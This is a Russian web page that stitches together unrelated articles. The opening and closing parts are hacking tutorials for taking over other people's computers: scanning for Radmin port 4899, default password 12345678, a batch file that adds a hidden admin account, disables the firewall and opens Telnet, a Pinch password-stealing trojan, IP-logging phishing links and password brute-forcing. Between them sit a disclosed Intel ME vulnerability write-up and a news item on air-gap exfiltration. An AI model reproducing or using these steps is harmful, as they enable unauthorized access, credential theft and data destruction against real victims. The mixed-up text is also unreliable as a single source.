Можно ли взломать выключенный компьютер
Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).
Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)
Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Далее сохраняем и открываем.
После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.
Открываем радмин, жмем на желтую молнию и вводим айпи.
Жмем "Ок", и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдёт.
Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.
Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.
Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.
Для начала нам нужно написать батник и кинуть его жертве, чтобы он/она открыла его. Ах да, что такое батник и как его создать спросите вы.. Bat файлы - это обычные текстовые файлы, содержащие наборы команд интерпритатора и имеющие расширение bat. Для того чтобы создать такой файл, открываем блокнот, нажимаем "Сохранить как", выбираем "Все файлы" и пишем название файла, после которого нужно обязательно поставить .bat. Например: 123.bat.
В батник пишем следующее:
chcp 1251
net user root mypass /add
net localgroup Администраторы root /add
net localgroup Administrators root /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=4899 sec=-NTLM
net start Telnet
И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)
Узнаем айпи того, к кому хотите проникнуть в комп, как узнать - выхоит за рамки этой статьи.
Дальше коннектимся, вводим логин - root, а пароль - mypass, ну собственно и все.
На прошедшей недавно конференции Black Hat Europe исследователи Positive Technologies Марк Ермолов и Максим Горячий рассказали об уязвимости в Intel Management Engine 11, которая открывает злоумышленникам доступ к большей части данных и процессов на устройстве.
Такой уровень доступа означает также, что любой эксплуатирующий эту уязвимость злоумышленник, обойдя традиционную защиту на основе ПО, сможет проводить атаки даже при выключенном компьютере. Сегодня мы публикуем в нашем блоге подробности проведенного исследования.
1. Введение
Intel Management Engine — это закрытая технология, которая представляет собой интегрированный в микросхему Platform Controller Hub (PCH) микроконтроллер с набором встроенных периферийных устройств. Именно через PCH проходит почти все общение процессора с внешними устройствами, следовательно Intel ME имеет доступ практически ко всем данным на компьютере и возможность исполнения стороннего кода позволяет полностью скомпрометировать платформу. Такие безграничные возможности привлекают исследователей не первый год, но сейчас интерес к технологии Intel ME значительно вырос. Одной из причин этого является переход данной подсистемы на новую аппаратную (x86) и программную (доработанный MINIX в качестве операционной системы) архитектуру. Применение платформы x86 позволяет использовать всю мощь средств анализа бинарного кода, что ранее было затруднительно, так как до 11-й версии использовалось ядро с малораспространенной системой команд — ARC. К сожалению, анализ Intel ME 11-й версии был затруднен тем, что исполняемые модули упакованы кодом Хаффмана с неизвестными таблицами. Но нашей исследовательской группе удалось их восстановить (утилиту для распаковки образов можно найти на нашей странице в GitHub [2]).
После распаковки исполняемых модулей мы приступили к изучению программной и аппаратной «начинки» Intel ME. Нашу усилия были вознаграждены, и в итоге мы получили полный контроль над всей платформой.
1.1. Обзор Intel Management Engine 11
Детальное описание внутреннего устройства Intel ME и его компонентов можно найти в работах: [1], [3], [4]. Отметим, что, начиная с 2015 года в PCH было интегрировано процессорное ядро LMT набором команд х86. Такое ядро применяется в SOC Quark.
LMT2 IdCode ядра ME
C Intel Management Engine связано большое количество современных технологий Intel — Intel Active Management Technology, Intel Platform Trust Technology (fTPM), Intel Software Guard Extensions, Intel Protected Audio Video Path. Также ME является root of trust для технологий технологии Intel Boot Guard, которая не позволяет злоумышленнику внедрять свой код в UEFI. Основное назначение МЕ – начальная инициализация платформы, и запуск основного процессора. ME так же обладает практически безграничными возможности доступа к данным, которые обрабатываются на компьютере МЕ может перехватывать и модифицировать сетевые пакеты, изображение на видеокарте, имеет полный доступ к USB устройствам. Такие возможности означат, что, если злоумышленник получит возможность выполнять свой код внутри МЕ это будет означать новую эру зловредного программного обеспечения, которое невозможно обнаружить современными средствами защиты. Но к счастью за все 17 лет истории этой технологии было найдено всего 3 уязвимости (публично).
1.2. Публично известные уязвимости в Intel ME
1.2.1. Ring-3 Rootkits
Первая публичная уязвимость в Intel ME была найдена в 2009 году Alexander Tereshkin и Rafal Wojtczuk представили доклад на Black Hat Introducing Ring-3 Rootkits. Атака производилась через инъекцию кода в специализированную область памяти UMA, в которую МЕ выгружает неиспользованный в данный момент страницы памяти.
После оглашения результатов исследования Intel внедрил защиту UMA – теперь эта область шифруется AES-ом и для каждой страницы МЕ хранит ее контрольную сумму, которая проверяется при «возвращении» страницы в основную память МЕ.
1.2.2. Zero-Touch Provisioning
В 2010 году Vassilios Ververis представил атаку на реализацию МЕ в GM45. Используя режим конфигурирования «zero touch», он смог обойти авторизацию AMT.
1.2.3. Silent Bob is Silent
В мае 2017 году была опубликована уязвимость в системе авторизации AMT (CVE-2017-5689), которая позволяла неавторизованному пользователю получить полный доступ к основной системе на материнских платах с поддержкой технологии vPro.
Таким образом, до сегодняшнего времени была найдена только одна уязвимость (Ring-3 rootkits), которая позволяет выполнять произвольный код внутри Intel ME.
2. Векторы атак
Практически все данные, которые использует ME в своей работе либо явно, либо косвенно подписаны Intel. Но МЕ все-таки предоставляет некоторые возможности для взаимодействия с пользователем:
- Локальный управляющий интерфейс — HECI
- Сеть (только для vPro)
- Память хоста (UMA)
- SPI флеш
- Внутренняя файловая система
2.1. HECI
2.2. Сеть (только vPro)
AMТ представляет собой один большой модуль, в который интегрировано огромное количество различных сетевых протоколов различного уровня, данный модуль содержит в себе большое количество legacy-кода, но присутствует только на системах бизнес-сегмента.
2.3. Аппаратная атака на SPI-интерфейс
В процессе изучения МЕ у нас возникла идея обойти проверку подписи с помощью эмулятора SPI-флеш. Это специализированное устройство, которое выглядело бы для PCH как обычная SPI-flash но при разных обращениях оно отправляет разные данные. Таким образом если вначлае контролируется подпись данных, а потом они перечитываются то можно провести атаку и внедрить свой код во внутрь МЕ. Найти таких ошибок в прошивке нам не удалось, данные вначале вычитываются, затем проверяется подпись. При повторных обращениях контролируется их идентичность тем данным, которые были получены при первом чтении.
2.4. Внутренняя файловая система
Intel Management Engine использует SPI flash в качестве основного файлового хранилища с собственной файловой системой. C одной стороны файловая система имеет достаточно сложную структуру [6], с другой многие привилегированные процессы хранят именно здесь свои конфигурационные фалы. Исходя из чего, файловая система показалась нам наиболее перспективным местом для воздействия на ME.
Следующим шагом в поиске уязвимости был выбор бинарного модуля.
2.5. Выбор модуля для анализа
В операционной системе МЕ реализована похожая на применяемую в Unix модель разграничения и контроля доступа, с той разницей, что в качестве субъектов системы выступают процессы. Для каждого процесса статически задаются его идентификатор пользователя, группы, список доступного оборудования и разрешенные системные вызовы.
Пример статических правил для процесса
Таким образом не каждый процесс в системе может загружать модули на исполнение. Причем, контроль целостности и привилегии устанавливает запускающий его процесс. Он может поднять свои привилегии, задав новому процессу высокие права доступа.
Одним из процессов с возможностью порождать новые является – BUP (BringUP). В процессе реверс-инжиниринга этого модуля, в функции инициализации устройства Trace Hab мы нашли переполнение стекового буфера. Файл «/home/bup/ct» не имел подписи, и мог быть интегрирован в прошивку МЕ через сервисную программу – Flash Image Tool. Это давало возможность вызвать переполнение буфера внутри процесса BUP с помощью файла инициализации BUP большого размера. Но поэксплуатировать ее можно было только после обхода защиты от переполнения стекового буфера.
Переполнение буфера в стеке
2.6. Обход защиты от переполнения буфера
В ME реализован классический способ защиты от переполнения буфера в стеке – стековая канарейка. Реализован данный механизм следующим образом:
- Для каждого процесса в момент его создания из аппаратного генератора случайных чисел в специальную область (доступную только для чтения) копируется 32-битное значение;
- В прологе функции — это значение копируется над адресом возврата в стеке, тем самым защищая его;
- В эпилоге функции происходит сравнение сохранённого значения с эталонным. Если оно не совпадает генерируется программное прерывание int 81h завершающие процесс.
Изучая функции, которые вызываются после переполнения и до проверки целостности нами было обнаружено, что функция, которую мы назвали bup_dfs_read_file косвенно вызывает memcpy. Она в свою очередь использует в качестве значения целевого адреса, данные полученные из некоторой структуры, которую мы назвали TLS (Th
read Local Storage). Стоит отметить, что функции bup для чтения и записи файлов, используют сервисы системной библиотеки для работы с общей памятью (shared memory). Используя его, функции чтeния и записи, получают и записывают информацию. Но никто кроме BUP эти данные не использует, поэтому использование этого механизма может показаться сомнительными. Мы считаем, что это связано с тем, что часть кода BUP, который взаимодействует с MFS скопирован из другого модуля – драйвера файловой системы, где использование общую память оправдано.
Вызов функции memcpy
Получение адреса из TLS
Как выяснилось позже, при переполнении буфера эта область TLS может быть перезаписана функцией чтения файла, что позволяет обойти защиту от переполнения буфера.
2.7. Thread Local Storage
Все обращение к структуре TLS происходит через сегментный регистр gs сама же структура имеет следующий вид:
Структура TLS
Получение полей TLS
Сегмент, на который указывает gs, не доступен на запись, но сама структура TLS расположена на дне стека (. ), что позволяет изменять ее в обход ограничения. Таким образом, при переполнении буфера мы можем перезаписать указатель на TLS и формировать структуру SYSLIB_CTX. А алгоритм работы алгоритм работы функции bup_dfs_read_file, используя этот трюк, позволяет получить arbitrary write.
2.8. Использование реализации функции чтения для получения arbitrary write primitive
Функция bup_dfs_read_file считывает данные с SPI-flsh блоками по 64 байта, что позволяет вначале перезаписать указатель на SYSLIB_CTX а TLS. На следующей итерации функция sys_write_shared_mem извлекает адрес, который мы сформировали и передает его в memcpy в качестве целевого адресса. Это позволяет получить примитив записи внутри процесса BUP.
Итеративное чтение файла внутри bup_dfs_read_file
Отсутствие ASLR позволяет перезаписать адрес возврата функцией memcpy и перехватить управление. Тут так же поджидает неприятность для атакующего – стек не является исполняемым. Но пользуясь тем, что BUP умеет создавать новые процессы и сам проверяет подпись для запускаемых модулей, мы можем с помощью возвратно-ориентированного программирования (Return Oriented Programming — ROP) создать новый процесс с заданными правами.
2.9. Возможные векторы эксплуатации
Для успешной эксплуатации данной уязвимости необходим доступ на запись в MFS или целиком в Intel ME регион. Производителям оборудования должны блокировать доступ к региону с ME, но к сожалению, это делают далеко не все [8]. В случае, если на системе присутствует такая ошибка конфигурации – это автоматически делает ее уязвимой.
Одним из самых насущных вопросов является вопрос о возможности удаленной эксплуатации. Нам кажется, что такая возможность есть, если выполнены следующие условия:
- Атакуется платформа с активированным AMT.
- Атакующий знает пароль администратора AMT или использует уязвимость для обхода авторизации.
- BIOS не имеет пароля (или он известен злоумышленнику).
- BIOS имеет опцию, позволяющую открывать доступ на запись в ME регион.
Отметим так же, что ROM не контролирует версию Intel ME при запуске, что делает возможным обновлением на старую версию, содержащую уязвимость.
2.10. Обзор уязвимостей CVE-2017-5705,6,7
Найденной уязвимости был присвоен номер INTEL-SA-00086 (CVE-2017-5705, CVE-2017-5706, CVE-2017-5707). Приведем небольшую выдержку из его описания:
- 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
- 6th, 7th & 8th Generation Intel Core Processor Family
- Intel Xeon Processor E3-1200 v5 & v6 Product Family
- Intel Xeon Processor Scalable Family
- Intel Xeon Processor W Family
- Intel Atom C3000 Processor Family
- Apollo Lake Intel Atom Processor E3900 series
- Apollo Lake Intel Pentium
- Celeron N and J series Processors
2.11. Disclosure Timeline
- June 27, 2017 — Bug reported to Intel PSIRT
- June 28, 2017 — Intel started initial investigation
- July 5, 2017 — Intel requested proof-of-concept
- July 6, 2017 — Additional information sent to Intel PSIRT
- July 17, 2017 — Intel acknowledged the vulnerability
- July 28, 2017 — Bounty payment received
- November 20, 2017 — Intel published SA-00086 security advisory
3. Заключение
Таким образом, нами была найдена уязвимость Intel ME, которая позволяет выполнять произвольный код. Это ставит под угрозу все технологии такие технологии как Intel Protected Audio Video Path (PAVP), Intel Platform Trust Technology (PTT или fTPM), Intel BootGuard, Intel Software Guard Extention (SGX) и многие другие.
Эксплуатируя найденную нами уязвимость в модуле bup, нам удалось включить механизм, называемый PCH red unlock, который открывает полный доступ ко всем устройствам PCH, для использование их через DFx chain, иначе говоря с помощью JTAG. Одним из таких устройств и является само ядро ME. Это дало возможность отлаживать код, выполняемый на ME, читать память всех процессов и ядра, а так же, управлять всеми устройствами внутри PCH. Мы насчитали в совокупности порядка 50 внутренних устройств, полный доступ к которым имеет только ME, а основной процессор только к весьма ограниченному их подмножеству.
Мы не утверждаем, что в нашем исследовании нет ошибок или оно является исчерпывающим. Тем не менее, мы надеемся, что оно поможет другим исследователям, интересующимся безопасностью и «начинкой» Intel ME.
Экология познания. Израильские специалисты по безопасности из Университета имени Бен-Гуриона в Негеве успешно передали информациюс компьютера на обычный мобильный телефон, используя лишь электромагнитное излучение, которое компьютер испускает в нормальном рабочем режиме.
Израильские специалисты по безопасности из Университета имени Бен-Гуриона в Негеве успешно передали информациюс компьютера на обычный мобильный телефон, используя лишь электромагнитное излучение, которое компьютер испускает в нормальном рабочем режиме.
Кадр из демонстрации работы
Таким образом они улучшили свой результат от прошлого года, где для получения переданных данных требовался смартфон. Это исследование указывает на необходимость серьёзного ужесточения правил работы на секретных предприятиях. Даже компьютеры, полностью отключённые от интернета, можно использовать для незаметного выуживания из них секретных и чувствительных данных.
В 2014 году исследователи успешно осуществили передачу данных между компьютером и смартфоном. Для успешного проведения передачи необходимо было установить специальное ПО как на компьютер, так и на смартфон.
В качестве генератора радиосигналов и передатчика выступала видеокарта с подключённым к ней монитором. Модулированный сигнал улавливался встроенным в смартфон FM-радиоприёмником, и расшифровывался мобильным приложением. Исследователям удалось добиться скорости передачи в 60 байт/сек.
FM-приёмники обычно встраиваются в смартфоны не только как средство дополнительного развлечения, но и как возможность получить оповещения о стихийных бедствиях в случае отсутствия GSM-связи.
Но на особо секретные предприятия смартфоны проносить запрещено в любом случае — в них всё равно встроены фото (и видео) камеры, wi-fi, bluetooth и другие средства передачи данных, которые могут повредить безопасности предприятия. Зато на обычный телефон без всех этих новомодных штучек,- например, как Motorola C123, который исследователи использовали в своей работе,- подозрение вряд ли может пасть. Однако и его можно использовать как средство шпионажа.
На этот раз исследователи использовали для излучения модулированного радиосигнала шину данных компьютера. Особенно хорошо для этой цели подходят компьютеры с многоканальным устройством памяти — если одновременно передавать одинаковые данные по обоим каналам, то мощность сигнала усиливается.
Обычный телефон же удалось использовать вместо смартфона благодаря модификации его прошивки. Дополненная прошивка позволяет принимать цифровые данные на GSM-частотах. По задумке инженеров, обычное фоновое излучение компьютера при работе берётся за 0, а усиленное при помощи передачи специальных данных по шине — за 1. Передача разбита на блоки по 12 бит. Телефон ожидает начала блока (заголовок 1010), по нему подстраивается на текущий уровень сигнала, и затем принимает весь остальной блок.
Исследователи успешно проверили свою систему в помещении с несколькими работающими компьютерами, симулируя стандартную рабочую обстановку, а также сделали подобное ПО для различных ОС — как Windows, так и Linux.
Понравилась статья? Напишите свое мнение в комментариях.
Подпишитесь на наш ФБ:
Сегодня достаточно много говорится о взломе чужих компьютеров. Однако, как считают многие эксперты в этой области, правильнее было бы сказать не «как взломать чужой «комп», а «как получить к нему несанкционированный доступ». Ни о каких деструктивных действиях в данном случае и речи быть не может. Попробуем рассмотреть простейшие методы, при помощи которых можно решить проблему, как залезть в чужой «комп».
Вымышленные предубеждения
К сожалению, сегодня у многих пользователей начинает проявляться все больший страх перед тем, что их компьютерные терминалы могут взломать или «хакнуть». Откровенно говоря, это полный бред. Кому вы нужны? Понятно еще, когда на компьютерах или серверах хранится конфиденциальная информация. Тогда, да. Многие не прочь поживиться ею.
Домашние компьютерные системы взламывают в основном любители-хулиганы, которым просто нечего делать. Иногда, правда, встречаются и те, кто может украсть пароли доступа к сайтам или коды банковских карт (при условии, что они хранятся на домашнем терминале в незашифрованном виде). Но это редкость.
Разбираясь с тем, как залезть в чужой «комп», можно сказать (как ни странно это звучит), сделать это может даже ребенок при наличии соответствующих утилит и умении ими пользоваться. Рассмотрим самые примитивные способы.
На чем основывается взлом «компа»
В большинстве случаев используется простейший, но самый действенный метод. В принципе, сама проблема, как залезть в чужой «комп», сводится только к получению IP-адреса компьютерного терминала и одного из открытых портов жертвы. Что самое интересное, в большинстве случаев многие любители не избирают кого-то конкретно, а сканируют просто заранее заданный диапазон IP-адресов уязвимых компьютерных систем, так, просто ради интереса или опробования своих сил.
Поэтому тем, кто уж слишком опасается за свои данные, лучше заранее позаботиться о безопасности, установив соответствующее ПО.
Использование Shared Resource Scanner
Итак, вы задались вопросом о том, как зайти на чужой «комп». Для начала можно применить один из самых простых способов, заключающийся в использовании утилиты Shared Resource Scanner 6.2.
Прежде чем приступать к работе, в командной строке (меню «Выполнить»), к примеру, в Windows XP необходимо ввести команду winipcfg, чтобы узнать собственный IP-адрес. Появится окно с вашим адресом. Его нужно запомнить.
Открываем программу и в верхнем поле вводим собственный IP с изменением последних двух цифр на «1». В нижнем поле прописываем тот же IP, только последние две цифры меняем на 255. Строка TimeOut (время истечения ожидания) должна содержать значение «80». Остается нажать кнопку старта сканирования.
По окончании процесса в окне приложения начнут появляться компьютеры, выделенные разным шрифтом. Тонкий шрифт – защищенный терминал, жирный – слабо защищенный, жирный красный – без защиты вообще. Остается выделить компьютер отмеченный красным жирным шрифтом и нажать кнопку «Открыть». О-па! На экране вашего «компа» появились диски и логические разделы чужого компьютера.
Использование онлайн сниффера и XSpider
Несколько более сложным, но более эффективным методом является использование онлайн-сниффера. Для этого нужно зарегистрироваться на определенном сайте (по этическим соображениям не указывается, на каком именно), после чего, к примеру, загружаем какую-то картинку. После этого выдается ссылка на сниффер с содержанием перенаправления (редиректа) на загруженное изображение (тут обязательно нужно поставить галочку напротив строки «Записывать IP в лог»).
Теперь либо с сайта, либо с анонимного электронного почтового ящика отправляете жертве письмо с содержанием типа «На Ваш e-mail отправлено то-то и то-то. Нажмите сюда, чтобы просмотреть».
Теперь жертве остается только перейти по ссылке, и у вас в руках окажется требуемый IP.
В сканере XSpider 7.5 создаем новый профиль и переходим на вкладку «Сканер портов». Внизу рядом с надписью «default.prt» нажимаем еще одну кнопку справа, а в новом окне – кнопку «Новый». Снизу будет строка «Добавить порты». Сюда добавляем «4889» и «3389».
Затем, как было описано выше, создается еще один профиль. После чего в портах добавляется значение «23». Теперь вводим полученный IP жертвы и начинаем сканирование. Если хоть один из портов открыт, пытаемся подключиться. Если будет затребован пароль, по умолчанию вводим «12345678». Все, на компьютере жертвы можно делать все. что заблагорассудится.
Для справки: 4889 – порт Radmin, 3389 – Remote Desktop (Удаленный Рабочий стол), 23 – Telnet.
Программа Lamescan
Теперь несколько слов еще об одном способе, позволяющем узнать, как залезть в чужой «комп». Сначала используется программа VNC-scanner GUI 1.2 на предмет наличия IP-адресов с открытым портом 4899 или 3389.
Теперь в приложении Lamescan вводим нужные адреса и подбираем пароль. Можно придумать самому, можно скачать список наиболее часто используемых паролей из Интернета. Как только находится совпадение, можно радоваться.
Этические соображения
В заключение хочется отметить, что данная статья не является побуждением к действию. Это, скорее, общеобразовательный материал, ни в коем случае не несущий вреда пользователям. А тем, кто собирается этим заняться, стоит задуматься о правомерности таких действий и соображениях этики.
Читайте также: